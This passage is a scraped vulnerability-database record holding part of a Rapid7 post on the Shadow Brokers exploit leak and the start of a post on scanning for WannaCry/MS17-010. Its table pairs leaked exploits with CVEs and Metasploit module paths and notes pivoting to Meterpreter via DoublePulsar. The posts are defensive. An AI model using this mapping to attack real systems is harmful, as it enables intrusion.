#ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068 / CVE-2014-6324</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; 
font-family: Arial; color: #000000;\">auxiliary/admin/kerberos/ms14_068_kerberos_checksum</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span 
style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/ms08_067_check</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploits/windows/smb/ms08_067_netapi</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: #333333; font-family: Arial, sans-serif, sans; font-size: 10pt;\">In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What else can you do to protect yourselves?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">If patching is still in progress or will take a little bit longer to fully implement (we get it), then there are detections for the exploits that you can implement while patching is underway. 
For examples of ways to implement detections, check out <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7721\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2016/11/16/introspective-intelligence-understanding-detections\">this blog post </a>from Mike Scutt</span><span style=\"font-family: Arial; color: #000000;\">. </span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif; color: #000000; font-size: 10pt;\"><span style=\"color: #1155cc;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightidr%2F\" target=\"_blank\">Rapid7 InsightIDR</a></span><span style=\"color: #000000;\">, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Flist%3DPLMrgKzfE1aIN_nurFyggA7Oijqk0uH8VX%26v%3DsmuG6rHGQY8\" rel=\"nofollow\" target=\"_blank\">4-min Solution Short</a>.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak. 
</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What about that IIS 6 box we have on the public internet? </span></p><p><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (&ldquo;EnglishmanDentist&#8221;, &ldquo;EsteemAudit&#8221;, and &ldquo;ExplodingCan&#8221;) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried about the Equation Group?</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">T<span style=\"font-size: 10pt;\">he threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky&#8217;s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. 
This information can help you determine if your organization may have been targeted.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">While that is good news for most organizations, that doesn&#8217;t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals</strong></span><span style=\"font-family: Arial; color: #000000;\"><strong>.</strong> This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it takes criminals to incorporate exploits into their existing operations. It will not be long before we will start to see more widespread attacks using these tools. </span></span></p><p><span><span><br/></span></span><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Where should I build my underground bunker?</span></p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\">While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. 
That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn&#8217;t it.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7842-66217/Build+a+bunker.jpg\"><img alt=\"Build a bunker.jpg\" class=\"image-1 jive-image\" height=\"420\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7842-66217/746-420/Build+a+bunker.jpg\" style=\" width: 746.132px;\" width=\"746\"/></a></span></p></div><!-- [DocumentBodyEnd:988188db-6fd0-45a3-a3c1-27dc87650c8c] -->", "title": "The Shadow Brokers Leaked Exploits Explained", "cvelist": ["CVE-2014-6324", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 495, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-05-01T16:52:25", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:99E0CDF8-533A-4B89-A7F9-F0D8EB5BF55B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-22979", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41915", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:35474"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804799", 
"OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389", "KB3011780"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/KERBEROS/MS14_068_KERBEROS_CHECKSUM"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS14-068.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92950", "SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "cve", "idList": ["CVE-2014-6324", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200909-01-WINDOWS", "HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-70958", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2014-1949", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:C529724ABA8784A9BB8018E330CF2E24", "THREATPOST:DDE60DEFF6FB6D90F1C25A3E79E4E02E", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["MS17_010", "MS14_068"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:CD55D97C4B7F0F15409E50C509B347D3", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "cert", "idList": ["VU:213119"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}], "modified": "2017-05-01T16:52:25", "rev": 2}}, "reporter": "Rebekah Brown", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-06-07T14:57:05", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-06-19T18:16:21", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96625", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2017-06-19T18:16:21", "rev": 2}}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 258, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-25T17:57:11", "bulletin": {"published": "2017-05-22T15:17:48", "enchantments": {}, 
"id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 26, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f32fe863-cd13-4685-b0f5-aea5b4ded9f0] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. 
</strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access, an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; 